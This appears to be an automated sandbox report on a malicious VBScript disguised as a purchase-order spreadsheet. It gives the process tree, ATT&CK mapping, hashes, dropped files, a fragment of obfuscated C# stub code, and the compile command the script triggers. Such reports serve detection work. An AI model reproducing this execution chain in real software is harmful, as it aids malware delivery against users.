Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts21
Command and Scripting Interpreter		Path Interception11
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium1
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts421
Scripting		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts21
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts1
PowerShell		Logon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Deobfuscate/Decode Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script421
Scripting		LSA Secrets1
File and Directory Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
Obfuscated Files or Information		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 755440 Sample: PO-09784893 xlsx.vbs Startdate: 28/11/2022 Architecture: WINDOWS Score: 84 29 Malicious sample detected (through community Yara rule) 2->29 31 Sigma detected: Dot net compiler compiles file from suspicious location 2->31 33 Potential malicious VBS script found (suspicious strings) 2->33 35 Potential evasive VBS script found (use of timer() function in loop) 2->35 8 wscript.exe 1 1 2->8         started        process3 signatures4 37 VBScript performs obfuscated calls to suspicious functions 8->37 39 Wscript starts Powershell (via cmd or directly) 8->39 41 Obfuscated command line found 8->41 43 Very long command line found 8->43 11 powershell.exe 21 8->11         started        14 cmd.exe 1 8->14         started        process5 file6 27 C:\Users\user\AppData\...\ksa1shoc.cmdline, Unicode 11->27 dropped 16 csc.exe 3 11->16         started        19 conhost.exe 11->19         started        21 conhost.exe 14->21         started        process7 file8 25 C:\Users\user\AppData\Local\...\ksa1shoc.dll, PE32 16->25 dropped 23 cvtres.exe 1 16->23         started        process9

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
PO-09784893 xlsx.vbs2%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://crl.microsoft.co0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmpfalse
    		high
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.838609935.00000000047F1000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://crl.microsoft.copowershell.exe, 00000003.00000002.861091835.0000000007940000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://contoso.com/powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://contoso.com/Licensepowershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://contoso.com/Iconpowershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown

            World Map of Contacted IPs

            No contacted IP infos

            General Information

            Joe Sandbox Version:36.0.0 Rainbow Opal
            Analysis ID:755440
            Start date and time:2022-11-28 17:57:22 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 9m 57s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:PO-09784893 xlsx.vbs
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:10
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal84.expl.evad.winVBS@11/9@0/0
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 33
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Found application associated with file extension: .vbs
            • Override analysis time to 240s for JS/VBS files not yet terminated

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
            • Excluded domains from analysis (whitelisted): client.wns.windows.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            17:59:51API Interceptor33x Sleep call for process: powershell.exe modified

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASNs

            No context

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:modified
            Size (bytes):8003
            Entropy (8bit):4.839308921501875
            Encrypted:false
            SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
            MD5:937C6E940577634844311E349BD4614D
            SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
            SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
            SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
            Malicious:false
            Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

            C:\Users\user\AppData\Local\Temp\RES41DE.tmp

            Download File
            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Nov 29 01:59:57 2022, 1st section name ".debug$S"
            Category:dropped
            Size (bytes):1332
            Entropy (8bit):3.9766442806584554
            Encrypted:false
            SSDEEP:24:HUzW9NJRNHFhKPfwI+ycuZhN8lyakSllTPNnq92d:jJzTKPo1ul9a3hq9G
            MD5:5A4E00CCACE5868AAA337F3EBCEC8BC5
            SHA1:D076A269B89250F6A8F7A16140E866D112796096
            SHA-256:99989AA5805EB86F0F91D5A1B602F1BBF667672A75313947CFC406B255FCA582
            SHA-512:24F366131F0B896823E44B5AA8143C8ECFB240600F8A4869E17EDB52BDBC2FCFE57BA52CCFC23EB41356B6259A2F98BFB627D47B3D84DE37268706669CCED9B6
            Malicious:false
            Preview:L....g.c.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........U....c:\Users\user\AppData\Local\Temp\ksa1shoc\CSC45555F46326F41418DCB1F5062A9163A.TMP....................[..m..|...$:............5.......C:\Users\user\AppData\Local\Temp\RES41DE.tmp.-.<...................'...Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...k.s.a.1.s.h.o.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bujopahg.iyl.psm1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_daxdyhsl.wnc.ps1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1

            C:\Users\user\AppData\Local\Temp\ksa1shoc\CSC45555F46326F41418DCB1F5062A9163A.TMP

            Download File
            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
            File Type:MSVC .res
            Category:dropped
            Size (bytes):652
            Entropy (8bit):3.096275784221629
            Encrypted:false
            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grymlHSak7YnqqllHzPN5Dlq5J:+RI+ycuZhN8lyakSllTPNnqX
            MD5:C61B5BAAD76D0DD77CF4A2E8243A1413
            SHA1:CFC6184E06A84CE1252FA7E6C1C7F8E210889947
            SHA-256:74B5220AC3B0ABFEB55A34615BB7A17651B0BC6B717FFF5A6312C315A88C11FE
            SHA-512:1B2A771C8766717B046C70446C89228283C70BB7025A3B4FEB421234E5B7E176B8A356573D2B489D5356921896895B36ACFD3148030B35F67110ACFAD855340C
            Malicious:false
            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...k.s.a.1.s.h.o.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...k.s.a.1.s.h.o.c...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

            C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.0.cs

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1330), with no line terminators
            Category:dropped
            Size (bytes):1333
            Entropy (8bit):5.039121039231445
            Encrypted:false
            SSDEEP:24:JVS3UwgVcVn1pl65/6f8cwM2sVS86mCVmuWyBeFcwXQ:JVAngyVn1pl65/6EPYpaVmry0FPXQ
            MD5:5275A510067D1ABB9D22D3925B1C219F
            SHA1:41B1A3E7A0EE598898BFDC2E5BFDF6A2D34E6D64
            SHA-256:F44938B9BA94A2465515FD9EA6D319016294EAFA6EDC89A5D2E736195C3FA649
            SHA-512:B8CC343A3A47116F796D7554DEF206E86DEFEF0379DE0D3EA8870B8655425CD9ADBD08600452313D9D9C7B0483BFCCF1809CB41AB53B36E24D951D6F1F7403DC
            Malicious:false
            Preview:.using System;using System.Runtime.InteropServices;public static class Thwartness1 {[DllImport("ADVAPI32.DLL")]public static extern int GetServiceKeyName(int Noyisl,int Slgt69,int Affal,int baga);[DllImport("gdi32")]public static extern int GetClipRgn(int Mul,int Ggegu);[DllImport("kernel32")]public static extern IntPtr EnumSystemLocalesW(uint v1,int v2);[DllImport("kernel32")]public static extern int GlobalDeleteAtom(int Pre151);[DllImport("gdi32")]public static extern int StrokeAndFillPath(int Ethyl87);[DllImport("user32")]public static extern int CloseClipboard();[DllImport("winspool.drv")]public static extern int ScheduleJob(int Unover226,int akti);[DllImport("ADVAPI32.DLL")]public static extern int QueryServiceConfig(int Regler,int Cos0,int Dispos,int Napho27);[DllImport("winspool.drv")]public static extern int DocumentProperties(int Fors,int Langre,int Skriv,int hem,int Sambaf,int Reti);[DllImport("gdi32")]public static extern int PtVisible(int Sat,int Aspa,int Prjsis);[DllImpo

            C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
            Category:dropped
            Size (bytes):371
            Entropy (8bit):5.222664376213209
            Encrypted:false
            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fnJUzxs7+AEszI923fz:p37Lvkmb6KzxUWZE2L
            MD5:599EE5EEF75ACB851BF5E4A996A41B67
            SHA1:703DCEB87B4233C99D76D4688223717FD8D1A881
            SHA-256:ED2F6701C64A817806D8556C8D007D28CAF91F01B3A854DDAC1425327B01C002
            SHA-512:3334B84413970134C101D9F39F5AE522651759644081C55D6C9E353AE0D430B9DF8D5A7A5262151149FD711F625F1E6856C0833996CD6C4E2FA39A1E8851CAC9
            Malicious:true
            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.0.cs"

            C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.dll

            Download File
            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):4096
            Entropy (8bit):3.308197344184482
            Encrypted:false
            SSDEEP:48:6k94JSH+GEZhAdlfdW4pxrIUZQFnZg1ul9a3hq:7eSeHhYVdWGxrIUq/K
            MD5:60B2FEFC99117C746AFAC55504B79E2C
            SHA1:32A59A55514E4F4E0608C6993F13D1EF455CA951
            SHA-256:725FA9A114EC1E33F22D2FFAB250A6F8D42021C497906481C0A45B7A3D6F3834
            SHA-512:D34334DAB81BADEEB3BB60B5D065BB4C13E581F12C08660205BAAE8F94C72C70D8522DCC6046D102F824C24D254B1C8CD2590B863FDB42AC5F62CEF74447BC80
            Malicious:false
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g.c...........!.................'... ...@....... ....................................@..................................&..W....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......P ..t...........................................................BSJB............v4.0.30319......l.......#~..T.......#Strings............#US.........#GUID.......p...#Blob...........G.........%3....................%.......................................3.,...............S.4.................................... :............ L............ W............ j............ {............ ..#.......... ............. ............. ..'.......... ..1.......... ............. ........

            C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.out

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
            Category:modified
            Size (bytes):866
            Entropy (8bit):5.297441338370161
            Encrypted:false
            SSDEEP:24:Aqd3ka6Kzx1E2KKaM5DqBVKVrdFAMBJTH:Aika6aHE2KKxDcVKdBJj
            MD5:2DA554008CD82D16927849B91ECB7DF2
            SHA1:D352F0441621E0FFBF6E83D0463449DD17C60D12
            SHA-256:D386A8DD9B8D57B2221AAB1ADEF86C66A3B8508C63E0322C06EA4DCA0C3B829E
            SHA-512:1C6716E6E58B52DE96165A0EFFC16947C81080DBBA8DD8089727635B1DBFC806DE6F7D21655A881F036DA58C5E60EF9DA76A9D860F316BFEA9D2F39DF269F83A
            Malicious:false
            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

            Static File Info

            General

            File type:ASCII text, with CRLF line terminators
            Entropy (8bit):5.869402783042103
            TrID:
              File name:PO-09784893 xlsx.vbs
              File size:359082
              MD5:bfa859d9ad7b23d3606ea13f525065a7
              SHA1:a1b3e395dc20bcdaa866b953a08a48d0079bace2
              SHA256:ec51e9ad23c469e82059bd497873749017e80e136053a25c7a752ffa18bf2002
              SHA512:355600deeb50415c614e324248f918e3296a9e5b5cf0c3c89a4a41b4d796c6e556f418895fcd0bd132c38cea753e56d9f731b192e9bbf780f97a95847478017d
              SSDEEP:6144:JBYNxYY6fG4TOZLzB65IL/IRL5PIQTzW42RcCUsaPw9L3x2I/rjbpHZIKK:7U6+4q5B65dRVPIQMcCUsqQU86KK
              TLSH:A8748C1CDA2527D7FD1A735AA8D10AC83DED30251F26F769ACED4279F1C21D8873A209
              File Content Preview:..'zephyrian stratagem Wigwamerne177 Alcoholisable53 PROMISINGLY ..'ACETAMID GRANULARITY Mandatet torteaus TANGFORLSENDES ALTOCUMULUS Jambarts ..'Gein187 garglers Goslet Afblsnings ENEHERREDMMERS UNDSEELIGHED TUSSENS Mrtelvrkets139 HOG besvrger stellularl

              File Icon

              Icon Hash:e8d69ece869a9ec4

              Network Behavior

              No network behavior found

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:17:58:22
              Start date:28/11/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs"
              Imagebase:0x7ff731e70000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:1
              Start time:17:58:25
              Start date:28/11/2022
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:CMD.EXE /c echo C:\Windows
              Imagebase:0x7ff627730000
              File size:273920 bytes
              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:2
              Start time:17:58:25
              Start date:28/11/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7fcd70000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:3
              Start time:17:58:57
              Start date:28/11/2022
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
